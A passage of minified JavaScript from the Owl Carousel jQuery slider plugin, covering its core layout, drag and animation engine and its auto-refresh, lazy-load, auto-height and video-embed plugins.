b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({filter:c.filter,run:a.proxy(c.run,this)})},this)),this.setup(),this.initialize()}e.Defaults={items:3,loop:!1,center:!1,rewind:!1,checkVisibility:!0,mouseDrag:!0,touchDrag:!0,pullDrag:!0,freeDrag:!1,margin:0,stagePadding:0,merge:!1,mergeFit:!0,autoWidth:!1,startPosition:0,rtl:!1,smartSpeed:250,fluidSpeed:!1,dragEndSpeed:!1,responsive:{},responsiveRefreshRate:200,responsiveBaseElement:b,fallbackEasing:"swing",slideTransition:"",info:!1,nestedItemSelector:!1,itemElement:"div",stageElement:"div",refreshClass:"owl-refresh",loadedClass:"owl-loaded",loadingClass:"owl-loading",rtlClass:"owl-rtl",responsiveClass:"owl-responsive",dragClass:"owl-drag",itemClass:"owl-item",stageClass:"owl-stage",stageOuterClass:"owl-stage-outer",grabClass:"owl-grab"},e.Width={Default:"default",Inner:"inner",Outer:"outer"},e.Type={Event:"event",State:"state"},e.Plugins={},e.Workers=[{filter:["width","settings"],run:function(){this._width=this.$element.width()}},{filter:["width","items","settings"],run:function(a){a.current=this._items&&this._items[this.relative(this._current)]}},{filter:["items","settings"],run:function(){this.$stage.children(".cloned").remove()}},{filter:["width","items","settings"],run:function(a){var b=this.settings.margin||"",c=!this.settings.autoWidth,d=this.settings.rtl,e={width:"auto","margin-left":d?b:"","margin-right":d?"":b};!c&&this.$stage.children().css(e),a.css=e}},{filter:["width","items","settings"],run:function(a){var b=(this.width()/this.settings.items).toFixed(3)-this.settings.margin,c=null,d=this._items.length,e=!this.settings.autoWidth,f=[];for(a.items={merge:!1,width:b};d--;)c=this._mergers[d],c=this.settings.mergeFit&&Math.min(c,this.settings.items)||c,a.items.merge=c>1||a.items.merge,f[d]=e?b*c:this._items[d].width();this._widths=f}},{filter:["items","settings"],run:function(){var b=[],c=this._items,d=this.settings,e=Math.max(2*d.items,4),f=2*Math.ceil(c.length/2),g=d.loop&&c.length?d.rewind?e:Math.max(e,f):0,h="",i="";for(g/=2;g>0;)b.push(this.normalize(b.length/2,!0)),h+=c[b[b.length-1]][0].outerHTML,b.push(this.normalize(c.length-1-(b.length-1)/2,!0)),i=c[b[b.length-1]][0].outerHTML+i,g-=1;this._clones=b,a(h).addClass("cloned").appendTo(this.$stage),a(i).addClass("cloned").prependTo(this.$stage)}},{filter:["width","items","settings"],run:function(){for(var a=this.settings.rtl?1:-1,b=this._clones.length+this._items.length,c=-1,d=0,e=0,f=[];++c<b;)d=f[c-1]||0,e=this._widths[this.relative(c)]+this.settings.margin,f.push(d+e*a);this._coordinates=f}},{filter:["width","items","settings"],run:function(){var a=this.settings.stagePadding,b=this._coordinates,c={width:Math.ceil(Math.abs(b[b.length-1]))+2*a,"padding-left":a||"","padding-right":a||""};this.$stage.css(c)}},{filter:["width","items","settings"],run:function(a){var b=this._coordinates.length,c=!this.settings.autoWidth,d=this.$stage.children();if(c&&a.items.merge)for(;b--;)a.css.width=this._widths[this.relative(b)],d.eq(b).css(a.css);else c&&(a.css.width=a.items.width,d.css(a.css))}},{filter:["items"],run:function(){this._coordinates.length<1&&this.$stage.removeAttr("style")}},{filter:["width","items","settings"],run:function(a){a.current=a.current?this.$stage.children().index(a.current):0,a.current=Math.max(this.minimum(),Math.min(this.maximum(),a.current)),this.reset(a.current)}},{filter:["position"],run:function(){this.animate(this.coordinates(this._current))}},{filter:["width","position","items","settings"],run:function(){var a,b,c,d,e=this.settings.rtl?1:-1,f=2*this.settings.stagePadding,g=this.coordinates(this.current())+f,h=g+this.width()*e,i=[];for(c=0,d=this._coordinates.length;c<d;c++)a=this._coordinates[c-1]||0,b=Math.abs(this._coordinates[c])+f*e,(this.op(a,"<=",g)&&this.op(a,">",h)||this.op(b,"<",g)&&this.op(b,">",h))&&i.push(c);this.$stage.children(".active").removeClass("active"),this.$stage.children(":eq("+i.join("), :eq(")+")").addClass("active"),this.$stage.children(".center").removeClass("center"),this.settings.center&&this.$stage.children().eq(this.current()).addClass("center")}}],e.prototype.initializeStage=function(){this.$stage=this.$element.find("."+this.settings.stageClass),this.$stage.length||(this.$element.addClass(this.options.loadingClass),this.$stage=a("<"+this.settings.stageElement+">",{class:this.settings.stageClass}).wrap(a("<div/>",{class:this.settings.stageOuterClass})),this.$element.append(this.$stage.parent()))},e.prototype.initializeItems=function(){var b=this.$element.find(".owl-item");if(b.length)return this._items=b.get().map(function(b){return a(b)}),this._mergers=this._items.map(function(){return 1}),void this.refresh();this.replace(this.$element.children().not(this.$stage.parent())),this.isVisible()?this.refresh():this.invalidate("width"),this.$element.removeClass(this.options.loadingClass).addClass(this.options.loadedClass)},e.prototype.initialize=function(){if(this.enter("initializing"),this.trigger("initialize"),this.$element.toggleClass(this.settings.rtlClass,this.settings.rtl),this.settings.autoWidth&&!this.is("pre-loading")){var a,b,c;a=this.$element.find("img"),b=this.settings.nestedItemSelector?"."+this.settings.nestedItemSelector:d,c=this.$element.children(b).width(),a.length&&c<=0&&this.preloadAutoWidthImages(a)}this.initializeStage(),this.initializeItems(),this.registerEventHandlers(),this.leave("initializing"),this.trigger("initialized")},e.prototype.isVisible=function(){return!this.settings.checkVisibility||this.$element.is(":visible")},e.prototype.setup=function(){var b=this.viewport(),c=this.options.responsive,d=-1,e=null;c?(a.each(c,function(a){a<=b&&a>d&&(d=Number(a))}),e=a.extend({},this.options,c[d]),"function"==typeof e.stagePadding&&(e.stagePadding=e.stagePadding()),delete e.responsive,e.responsiveClass&&this.$element.attr("class",this.$element.attr("class").replace(new RegExp("("+this.options.responsiveClass+"-)\\S+\\s","g"),"$1"+d))):e=a.extend({},this.options),this.trigger("change",{property:{name:"settings",value:e}}),this._breakpoint=d,this.settings=e,this.invalidate("settings"),this.trigger("changed",{property:{name:"settings",value:this.settings}})},e.prototype.optionsLogic=function(){this.settings.autoWidth&&(this.settings.stagePadding=!1,this.settings.merge=!1)},e.prototype.prepare=function(b){var c=this.trigger("prepare",{content:b});return c.data||(c.data=a("<"+this.settings.itemElement+"/>").addClass(this.options.itemClass).append(b)),this.trigger("prepared",{content:c.data}),c.data},e.prototype.update=function(){for(var b=0,c=this._pipe.length,d=a.proxy(function(a){return this[a]},this._invalidated),e={};b<c;)(this._invalidated.all||a.grep(this._pipe[b].filter,d).length>0)&&this._pipe[b].run(e),b++;this._invalidated={},!this.is("valid")&&this.enter("valid")},e.prototype.width=function(a){switch(a=a||e.Width.Default){case e.Width.Inner:case e.Width.Outer:return this._width;default:return this._width-2*this.settings.stagePadding+this.settings.margin}},e.prototype.refresh=function(){this.enter("refreshing"),this.trigger("refresh"),this.setup(),this.optionsLogic(),this.$element.addClass(this.options.refreshClass),this.update(),this.$element.removeClass(this.options.refreshClass),this.leave("refreshing"),this.trigger("refreshed")},e.prototype.onThrottledResize=function(){b.clearTimeout(this.resizeTimer),this.resizeTimer=b.setTimeout(this._handlers.onResize,this.settings.responsiveRefreshRate)},e.prototype.onResize=function(){return!!this._items.length&&(this._width!==this.$element.width()&&(!!this.isVisible()&&(this.enter("resizing"),this.trigger("resize").isDefaultPrevented()?(this.leave("resizing"),!1):(this.invalidate("width"),this.refresh(),this.leave("resizing"),void this.trigger("resized")))))},e.prototype.registerEventHandlers=function(){a.support.transition&&this.$stage.on(a.support.transition.end+".owl.core",a.proxy(this.onTransitionEnd,this)),!1!==this.settings.responsive&&this.on(b,"resize",this._handlers.onThrottledResize),this.settings.mouseDrag&&(this.$element.addClass(this.options.dragClass),this.$stage.on("mousedown.owl.core",a.proxy(this.onDragStart,this)),this.$stage.on("dragstart.owl.core selectstart.owl.core",function(){return!1})),this.settings.touchDrag&&(this.$stage.on("touchstart.owl.core",a.proxy(this.onDragStart,this)),this.$stage.on("touchcancel.owl.core",a.proxy(this.onDragEnd,this)))},e.prototype.onDragStart=function(b){var d=null;3!==b.which&&(a.support.transform?(d=this.$stage.css("transform").replace(/.*\(|\)| /g,"").split(","),d={x:d[16===d.length?12:4],y:d[16===d.length?13:5]}):(d=this.$stage.position(),d={x:this.settings.rtl?d.left+this.$stage.width()-this.width()+this.settings.margin:d.left,y:d.top}),this.is("animating")&&(a.support.transform?this.animate(d.x):this.$stage.stop(),this.invalidate("position")),this.$element.toggleClass(this.options.grabClass,"mousedown"===b.type),this.speed(0),this._drag.time=(new Date).getTime(),this._drag.target=a(b.target),this._drag.stage.start=d,this._drag.stage.current=d,this._drag.pointer=this.pointer(b),a(c).on("mouseup.owl.core touchend.owl.core",a.proxy(this.onDragEnd,this)),a(c).one("mousemove.owl.core touchmove.owl.core",a.proxy(function(b){var d=this.difference(this._drag.pointer,this.pointer(b));a(c).on("mousemove.owl.core touchmove.owl.core",a.proxy(this.onDragMove,this)),Math.abs(d.x)<Math.abs(d.y)&&this.is("valid")||(b.preventDefault(),this.enter("dragging"),this.trigger("drag"))},this)))},e.prototype.onDragMove=function(a){var b=null,c=null,d=null,e=this.difference(this._drag.pointer,this.pointer(a)),f=this.difference(this._drag.stage.start,e);this.is("dragging")&&(a.preventDefault(),this.settings.loop?(b=this.coordinates(this.minimum()),c=this.coordinates(this.maximum()+1)-b,f.x=((f.x-b)%c+c)%c+b):(b=this.settings.rtl?this.coordinates(this.maximum()):this.coordinates(this.minimum()),c=this.settings.rtl?this.coordinates(this.minimum()):this.coordinates(this.maximum()),d=this.settings.pullDrag?-1*e.x/5:0,f.x=Math.max(Math.min(f.x,b+d),c+d)),this._drag.stage.current=f,this.animate(f.x))},e.prototype.onDragEnd=function(b){var d=this.difference(this._drag.pointer,this.pointer(b)),e=this._drag.stage.current,f=d.x>0^this.settings.rtl?"left":"right";a(c).off(".owl.core"),this.$element.removeClass(this.options.grabClass),(0!==d.x&&this.is("dragging")||!this.is("valid"))&&(this.speed(this.settings.dragEndSpeed||this.settings.smartSpeed),this.current(this.closest(e.x,0!==d.x?f:this._drag.direction)),this.invalidate("position"),this.update(),this._drag.direction=f,(Math.abs(d.x)>3||(new Date).getTime()-this._drag.time>300)&&this._drag.target.one("click.owl.core",function(){return!1})),this.is("dragging")&&(this.leave("dragging"),this.trigger("dragged"))},e.prototype.closest=function(b,c){var e=-1,f=30,g=this.width(),h=this.coordinates();return this.settings.freeDrag||a.each(h,a.proxy(function(a,i){return"left"===c&&b>i-f&&b<i+f?e=a:"right"===c&&b>i-g-f&&b<i-g+f?e=a+1:this.op(b,"<",i)&&this.op(b,">",h[a+1]!==d?h[a+1]:i-g)&&(e="left"===c?a+1:a),-1===e},this)),this.settings.loop||(this.op(b,">",h[this.minimum()])?e=b=this.minimum():this.op(b,"<",h[this.maximum()])&&(e=b=this.maximum())),e},e.prototype.animate=function(b){var c=this.speed()>0;this.is("animating")&&this.onTransitionEnd(),c&&(this.enter("animating"),this.trigger("translate")),a.support.transform3d&&a.support.transition?this.$stage.css({transform:"translate3d("+b+"px,0px,0px)",transition:this.speed()/1e3+"s"+(this.settings.slideTransition?" "+this.settings.slideTransition:"")}):c?this.$stage.animate({left:b+"px"},this.speed(),this.settings.fallbackEasing,a.proxy(this.onTransitionEnd,this)):this.$stage.css({left:b+"px"})},e.prototype.is=function(a){return this._states.current[a]&&this._states.current[a]>0},e.prototype.current=function(a){if(a===d)return this._current;if(0===this._items.length)return d;if(a=this.normalize(a),this._current!==a){var b=this.trigger("change",{property:{name:"position",value:a}});b.data!==d&&(a=this.normalize(b.data)),this._current=a,this.invalidate("position"),this.trigger("changed",{property:{name:"position",value:this._current}})}return this._current},e.prototype.invalidate=function(b){return"string"===a.type(b)&&(this._invalidated[b]=!0,this.is("valid")&&this.leave("valid")),a.map(this._invalidated,function(a,b){return b})},e.prototype.reset=function(a){(a=this.normalize(a))!==d&&(this._speed=0,this._current=a,this.suppress(["translate","translated"]),this.animate(this.coordinates(a)),this.release(["translate","translated"]))},e.prototype.normalize=function(a,b){var c=this._items.length,e=b?0:this._clones.length;return!this.isNumeric(a)||c<1?a=d:(a<0||a>=c+e)&&(a=((a-e/2)%c+c)%c+e/2),a},e.prototype.relative=function(a){return a-=this._clones.length/2,this.normalize(a,!0)},e.prototype.maximum=function(a){var b,c,d,e=this.settings,f=this._coordinates.length;if(e.loop)f=this._clones.length/2+this._items.length-1;else if(e.autoWidth||e.merge){if(b=this._items.length)for(c=this._items[--b].width(),d=this.$element.width();b--&&!((c+=this._items[b].width()+this.settings.margin)>d););f=b+1}else f=e.center?this._items.length-1:this._items.length-e.items;return a&&(f-=this._clones.length/2),Math.max(f,0)},e.prototype.minimum=function(a){return a?0:this._clones.length/2},e.prototype.items=function(a){return a===d?this._items.slice():(a=this.normalize(a,!0),this._items[a])},e.prototype.mergers=function(a){return a===d?this._mergers.slice():(a=this.normalize(a,!0),this._mergers[a])},e.prototype.clones=function(b){var c=this._clones.length/2,e=c+this._items.length,f=function(a){return a%2==0?e+a/2:c-(a+1)/2};return b===d?a.map(this._clones,function(a,b){return f(b)}):a.map(this._clones,function(a,c){return a===b?f(c):null})},e.prototype.speed=function(a){return a!==d&&(this._speed=a),this._speed},e.prototype.coordinates=function(b){var c,e=1,f=b-1;return b===d?a.map(this._coordinates,a.proxy(function(a,b){return this.coordinates(b)},this)):(this.settings.center?(this.settings.rtl&&(e=-1,f=b+1),c=this._coordinates[b],c+=(this.width()-c+(this._coordinates[f]||0))/2*e):c=this._coordinates[f]||0,c=Math.ceil(c))},e.prototype.duration=function(a,b,c){return 0===c?0:Math.min(Math.max(Math.abs(b-a),1),6)*Math.abs(c||this.settings.smartSpeed)},e.prototype.to=function(a,b){var c=this.current(),d=null,e=a-this.relative(c),f=(e>0)-(e<0),g=this._items.length,h=this.minimum(),i=this.maximum();this.settings.loop?(!this.settings.rewind&&Math.abs(e)>g/2&&(e+=-1*f*g),a=c+e,(d=((a-h)%g+g)%g+h)!==a&&d-e<=i&&d-e>0&&(c=d-e,a=d,this.reset(c))):this.settings.rewind?(i+=1,a=(a%i+i)%i):a=Math.max(h,Math.min(i,a)),this.speed(this.duration(c,a,b)),this.current(a),this.isVisible()&&this.update()},e.prototype.next=function(a){a=a||!1,this.to(this.relative(this.current())+1,a)},e.prototype.prev=function(a){a=a||!1,this.to(this.relative(this.current())-1,a)},e.prototype.onTransitionEnd=function(a){if(a!==d&&(a.stopPropagation(),(a.target||a.srcElement||a.originalTarget)!==this.$stage.get(0)))return!1;this.leave("animating"),this.trigger("translated")},e.prototype.viewport=function(){var d;return this.options.responsiveBaseElement!==b?d=a(this.options.responsiveBaseElement).width():b.innerWidth?d=b.innerWidth:c.documentElement&&c.documentElement.clientWidth?d=c.documentElement.clientWidth:console.warn("Can not detect viewport width."),d},e.prototype.replace=function(b){this.$stage.empty(),this._items=[],b&&(b=b instanceof jQuery?b:a(b)),this.settings.nestedItemSelector&&(b=b.find("."+this.settings.nestedItemSelector)),b.filter(function(){return 1===this.nodeType}).each(a.proxy(function(a,b){b=this.prepare(b),this.$stage.append(b),this._items.push(b),this._mergers.push(1*b.find("[data-merge]").addBack("[data-merge]").attr("data-merge")||1)},this)),this.reset(this.isNumeric(this.settings.startPosition)?this.settings.startPosition:0),this.invalidate("items")},e.prototype.add=function(b,c){var e=this.relative(this._current);c=c===d?this._items.length:this.normalize(c,!0),b=b instanceof jQuery?b:a(b),this.trigger("add",{content:b,position:c}),b=this.prepare(b),0===this._items.length||c===this._items.length?(0===this._items.length&&this.$stage.append(b),0!==this._items.length&&this._items[c-1].after(b),this._items.push(b),this._mergers.push(1*b.find("[data-merge]").addBack("[data-merge]").attr("data-merge")||1)):(this._items[c].before(b),this._items.splice(c,0,b),this._mergers.splice(c,0,1*b.find("[data-merge]").addBack("[data-merge]").attr("data-merge")||1)),this._items[e]&&this.reset(this._items[e].index()),this.invalidate("items"),this.trigger("added",{content:b,position:c})},e.prototype.remove=function(a){(a=this.normalize(a,!0))!==d&&(this.trigger("remove",{content:this._items[a],position:a}),this._items[a].remove(),this._items.splice(a,1),this._mergers.splice(a,1),this.invalidate("items"),this.trigger("removed",{content:null,position:a}))},e.prototype.preloadAutoWidthImages=function(b){b.each(a.proxy(function(b,c){this.enter("pre-loading"),c=a(c),a(new Image).one("load",a.proxy(function(a){c.attr("src",a.target.src),c.css("opacity",1),this.leave("pre-loading"),!this.is("pre-loading")&&!this.is("initializing")&&this.refresh()},this)).attr("src",c.attr("src")||c.attr("data-src")||c.attr("data-src-retina"))},this))},e.prototype.destroy=function(){this.$element.off(".owl.core"),this.$stage.off(".owl.core"),a(c).off(".owl.core"),!1!==this.settings.responsive&&(b.clearTimeout(this.resizeTimer),this.off(b,"resize",this._handlers.onThrottledResize));for(var d in this._plugins)this._plugins[d].destroy();this.$stage.children(".cloned").remove(),this.$stage.unwrap(),this.$stage.children().contents().unwrap(),this.$stage.children().unwrap(),this.$stage.remove(),this.$element.removeClass(this.options.refreshClass).removeClass(this.options.loadingClass).removeClass(this.options.loadedClass).removeClass(this.options.rtlClass).removeClass(this.options.dragClass).removeClass(this.options.grabClass).attr("class",this.$element.attr("class").replace(new RegExp(this.options.responsiveClass+"-\\S+\\s","g"),"")).removeData("owl.carousel")},e.prototype.op=function(a,b,c){var d=this.settings.rtl;switch(b){case"<":return d?a>c:a<c;case">":return d?a<c:a>c;case">=":return d?a<=c:a>=c;case"<=":return d?a>=c:a<=c}},e.prototype.on=function(a,b,c,d){a.addEventListener?a.addEventListener(b,c,d):a.attachEvent&&a.attachEvent("on"+b,c)},e.prototype.off=function(a,b,c,d){a.removeEventListener?a.removeEventListener(b,c,d):a.detachEvent&&a.detachEvent("on"+b,c)},e.prototype.trigger=function(b,c,d,f,g){var h={item:{count:this._items.length,index:this.current()}},i=a.camelCase(a.grep(["on",b,d],function(a){return a}).join("-").toLowerCase()),j=a.Event([b,"owl",d||"carousel"].join(".").toLowerCase(),a.extend({relatedTarget:this},h,c));return this._supress[b]||(a.each(this._plugins,function(a,b){b.onTrigger&&b.onTrigger(j)}),this.register({type:e.Type.Event,name:b}),this.$element.trigger(j),this.settings&&"function"==typeof this.settings[i]&&this.settings[i].call(this,j)),j},e.prototype.enter=function(b){a.each([b].concat(this._states.tags[b]||[]),a.proxy(function(a,b){this._states.current[b]===d&&(this._states.current[b]=0),this._states.current[b]++},this))},e.prototype.leave=function(b){a.each([b].concat(this._states.tags[b]||[]),a.proxy(function(a,b){this._states.current[b]--},this))},e.prototype.register=function(b){if(b.type===e.Type.Event){if(a.event.special[b.name]||(a.event.special[b.name]={}),!a.event.special[b.name].owl){var c=a.event.special[b.name]._default;a.event.special[b.name]._default=function(a){return!c||!c.apply||a.namespace&&-1!==a.namespace.indexOf("owl")?a.namespace&&a.namespace.indexOf("owl")>-1:c.apply(this,arguments)},a.event.special[b.name].owl=!0}}else b.type===e.Type.State&&(this._states.tags[b.name]?this._states.tags[b.name]=this._states.tags[b.name].concat(b.tags):this._states.tags[b.name]=b.tags,this._states.tags[b.name]=a.grep(this._states.tags[b.name],a.proxy(function(c,d){return a.inArray(c,this._states.tags[b.name])===d},this)))},e.prototype.suppress=function(b){a.each(b,a.proxy(function(a,b){this._supress[b]=!0},this))},e.prototype.release=function(b){a.each(b,a.proxy(function(a,b){delete this._supress[b]},this))},e.prototype.pointer=function(a){var c={x:null,y:null};return a=a.originalEvent||a||b.event,a=a.touches&&a.touches.length?a.touches[0]:a.changedTouches&&a.changedTouches.length?a.changedTouches[0]:a,a.pageX?(c.x=a.pageX,c.y=a.pageY):(c.x=a.clientX,c.y=a.clientY),c},e.prototype.isNumeric=function(a){return!isNaN(parseFloat(a))},e.prototype.difference=function(a,b){return{x:a.x-b.x,y:a.y-b.y}},a.fn.owlCarousel=function(b){var c=Array.prototype.slice.call(arguments,1);return this.each(function(){var d=a(this),f=d.data("owl.carousel");f||(f=new e(this,"object"==typeof b&&b),d.data("owl.carousel",f),a.each(["next","prev","to","destroy","refresh","replace","add","remove"],function(b,c){f.register({type:e.Type.Event,name:c}),f.$element.on(c+".owl.carousel.core",a.proxy(function(a){a.namespace&&a.relatedTarget!==this&&(this.suppress([c]),f[c].apply(this,[].slice.call(arguments,1)),this.release([c]))},f))})),"string"==typeof b&&"_"!==b.charAt(0)&&f[b].apply(f,c)})},a.fn.owlCarousel.Constructor=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this._core=b,this._interval=null,this._visible=null,this._handlers={"initialized.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.autoRefresh&&this.watch()},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this._core.$element.on(this._handlers)};e.Defaults={autoRefresh:!0,autoRefreshInterval:500},e.prototype.watch=function(){this._interval||(this._visible=this._core.isVisible(),this._interval=b.setInterval(a.proxy(this.refresh,this),this._core.settings.autoRefreshInterval))},e.prototype.refresh=function(){this._core.isVisible()!==this._visible&&(this._visible=!this._visible,this._core.$element.toggleClass("owl-hidden",!this._visible),this._visible&&this._core.invalidate("width")&&this._core.refresh())},e.prototype.destroy=function(){var a,c;b.clearInterval(this._interval);for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(c in Object.getOwnPropertyNames(this))"function"!=typeof this[c]&&(this[c]=null)},a.fn.owlCarousel.Constructor.Plugins.AutoRefresh=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this._core=b,this._loaded=[],this._handlers={"initialized.owl.carousel change.owl.carousel resized.owl.carousel":a.proxy(function(b){if(b.namespace&&this._core.settings&&this._core.settings.lazyLoad&&(b.property&&"position"==b.property.name||"initialized"==b.type)){var c=this._core.settings,e=c.center&&Math.ceil(c.items/2)||c.items,f=c.center&&-1*e||0,g=(b.property&&b.property.value!==d?b.property.value:this._core.current())+f,h=this._core.clones().length,i=a.proxy(function(a,b){this.load(b)},this);for(c.lazyLoadEager>0&&(e+=c.lazyLoadEager,c.loop&&(g-=c.lazyLoadEager,e++));f++<e;)this.load(h/2+this._core.relative(g)),h&&a.each(this._core.clones(this._core.relative(g)),i),g++}},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this._core.$element.on(this._handlers)};e.Defaults={lazyLoad:!1,lazyLoadEager:0},e.prototype.load=function(c){var d=this._core.$stage.children().eq(c),e=d&&d.find(".owl-lazy");!e||a.inArray(d.get(0),this._loaded)>-1||(e.each(a.proxy(function(c,d){var e,f=a(d),g=b.devicePixelRatio>1&&f.attr("data-src-retina")||f.attr("data-src")||f.attr("data-srcset");this._core.trigger("load",{element:f,url:g},"lazy"),f.is("img")?f.one("load.owl.lazy",a.proxy(function(){f.css("opacity",1),this._core.trigger("loaded",{element:f,url:g},"lazy")},this)).attr("src",g):f.is("source")?f.one("load.owl.lazy",a.proxy(function(){this._core.trigger("loaded",{element:f,url:g},"lazy")},this)).attr("srcset",g):(e=new Image,e.onload=a.proxy(function(){f.css({"background-image":'url("'+g+'")',opacity:"1"}),this._core.trigger("loaded",{element:f,url:g},"lazy")},this),e.src=g)},this)),this._loaded.push(d.get(0)))},e.prototype.destroy=function(){var a,b;for(a in this.handlers)this._core.$element.off(a,this.handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Lazy=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(c){this._core=c,this._previousHeight=null,this._handlers={"initialized.owl.carousel refreshed.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.autoHeight&&this.update()},this),"changed.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.autoHeight&&"position"===a.property.name&&this.update()},this),"loaded.owl.lazy":a.proxy(function(a){a.namespace&&this._core.settings.autoHeight&&a.element.closest("."+this._core.settings.itemClass).index()===this._core.current()&&this.update()},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this._core.$element.on(this._handlers),this._intervalId=null;var d=this;a(b).on("load",function(){d._core.settings.autoHeight&&d.update()}),a(b).resize(function(){d._core.settings.autoHeight&&(null!=d._intervalId&&clearTimeout(d._intervalId),d._intervalId=setTimeout(function(){d.update()},250))})};e.Defaults={autoHeight:!1,autoHeightClass:"owl-height"},e.prototype.update=function(){var b=this._core._current,c=b+this._core.settings.items,d=this._core.settings.lazyLoad,e=this._core.$stage.children().toArray().slice(b,c),f=[],g=0;a.each(e,function(b,c){f.push(a(c).height())}),g=Math.max.apply(null,f),g<=1&&d&&this._previousHeight&&(g=this._previousHeight),this._previousHeight=g,this._core.$stage.parent().height(g).addClass(this._core.settings.autoHeightClass)},e.prototype.destroy=function(){var a,b;for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.AutoHeight=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this._core=b,this._videos={},this._playing=null,this._handlers={"initialized.owl.carousel":a.proxy(function(a){a.namespace&&this._core.register({type:"state",name:"playing",tags:["interacting"]})},this),"resize.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.video&&this.isInFullScreen()&&a.preventDefault()},this),"refreshed.owl.carousel":a.proxy(function(a){a.namespace&&this._core.is("resizing")&&this._core.$stage.find(".cloned .owl-video-frame").remove()},this),"changed.owl.carousel":a.proxy(function(a){a.namespace&&"position"===a.property.name&&this._playing&&this.stop()},this),"prepared.owl.carousel":a.proxy(function(b){if(b.namespace){var c=a(b.content).find(".owl-video");c.length&&(c.css("display","none"),this.fetch(c,a(b.content)))}},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this._core.$element.on(this._handlers),this._core.$element.on("click.owl.video",".owl-video-play-icon",a.proxy(function(a){this.play(a)},this))};e.Defaults={video:!1,videoHeight:!1,videoWidth:!1},e.prototype.fetch=function(a,b){var c=function(){return a.attr("data-vimeo-id")?"vimeo":a.attr("data-vzaar-id")?"vzaar":"youtube"}(),d=a.attr("data-vimeo-id")||a.attr("data-youtube-id")||a.attr("data-vzaar-id"),e=a.attr("data-width")||this._core.settings.videoWidth,f=a.attr("data-height")||this._core.settings.videoHeight,g=a.attr("href");if(!g)throw new Error("Missing video URL.");if(d=g.match(/(http:|https:|)\/\/(player.|www.|app.)?(vimeo\.com|youtu(be\.com|\.be|be\.googleapis\.com|be\-nocookie\.com)|vzaar\.com)\/(video\/|videos\/|embed\/|channels\/.+\/|groups\/.+\/|watch\?v=|v\/)?([A-Za-z0-9._%-]*)(\&\S+)?/),d[3].indexOf("youtu")>-1)c="youtube";else if(d[3].indexOf("vimeo")>-1)c="vimeo";else{if(!(d[3].indexOf("vzaar")>-1))throw new Error("Video URL not supported.");c="vzaar"}d=d[6],this._videos[g]={type:c,id:d,width:e,height:f},b.attr("data-video",g),this.thumbnail(a,this._videos[g])},e.prototype.thumbnail=function(b,c){var d,e,f,g=c.width&&c.height?"width:"+c.width+"px;height:"+c.height+"px;":"",h=b.find("img"),i="src",j="",k=this._core.settings,l=function(c){e='<div class="owl-video-play-icon"></div>',d=k.lazyLoad?a("<div/>",{class:"owl-video-tn "+j,srcType:c}):a("<div/>",{class:"owl-video-tn",style:"opacity:1;background-image:url("+c+")"}),b.after(d),b.after(e)};if(b.wrap(a("<div/>",{class:"owl-video-wrapper",style:g})),this._core.settings.lazyLoad&&(i="data-src",j="owl-lazy"),h.length)return l(h.attr(i)),h.remove(),!1;"youtube"===c.type?(f="//img.youtube.com/vi/"+c.id+"/hqdefault.jpg",l(f)):"vimeo"===c.type?a.ajax({type:"GET",url:"//vimeo.com/api/v2/video/"+c.id+".json",jsonp:"callback",dataType:"jsonp",success:function(a){f=a[0].thumbnail_large,l(f)}}):"vzaar"===c.type&&a.ajax({type:"GET",url:"//vzaar.com/api/videos/"+c.id+".json",jsonp:"callback",dataType:"jsonp",success:function(a){f=a.framegrab_url,l(f)}})},e.prototype.stop=function(){this._core.trigger("stop",null,"video"),this._playing.find(".owl-video-frame").remove(),this._playing.removeClass("owl-video-playing"),this._playing=null,this._core.leave("playing"),this._core.trigger("stopped",null,"video")},e.prototype.play=function(b){var c,d=a(b.target),e=d.closest("."+this._core.settings.itemClass),f=this._videos[e.attr("data-video")],g=f.width||"100%",h=f.height||this._core.$stage.height();this._playing||(this._core.enter("playing"),this._core.trigger("play",null,"video"),e=this._core.items(this._core.relative(e.index())),this._core.reset(e.index()),c=a('<iframe frameborder="0" allowfullscreen mozallowfullscreen webkitAllowFullScreen ></iframe>'),c.attr("height",h),c.attr("width",g),"youtube"===f.type?c.attr("src","//www.youtube.com/embed/"+f.id+"?autoplay=1&rel=0&v="+f.id):"vimeo"===f.type?c.attr("src","//player.vimeo.com/video/"+f.id+"?autoplay=1"):"vzaar"===f.type&&c.attr("src","//view.vzaar.com/"+f.id+"/player?autoplay=true"),a(c).wrap('<div class="owl-video-frame" />').insertAfter(e.find(".owl-video")),this._playing=e.addClass("owl-video-playing"))},e.prototype.isInFullScreen=function(){var b=c.fullscreenElement||c.mozFullScreenElement||c.webkitFullscreenElement;return b&&a(b).parent().hasClass("owl-video-frame")},e.prototype.destroy=function(){var a,b;this._core.$element.off("click.owl.video");for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Video=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this.core=b,this.core.options=a.extend({},e.Defaults,this.core.options),this.swapping=!0,this.previous=d,this.next=d,this.handlers={"change.owl.carousel":a.proxy(function(a){a.namespace&&"position"==a.property.name&&(this.previous=this.core.current(),this.next=a.property.value)},this),"drag.owl.carousel dragged.owl.carousel 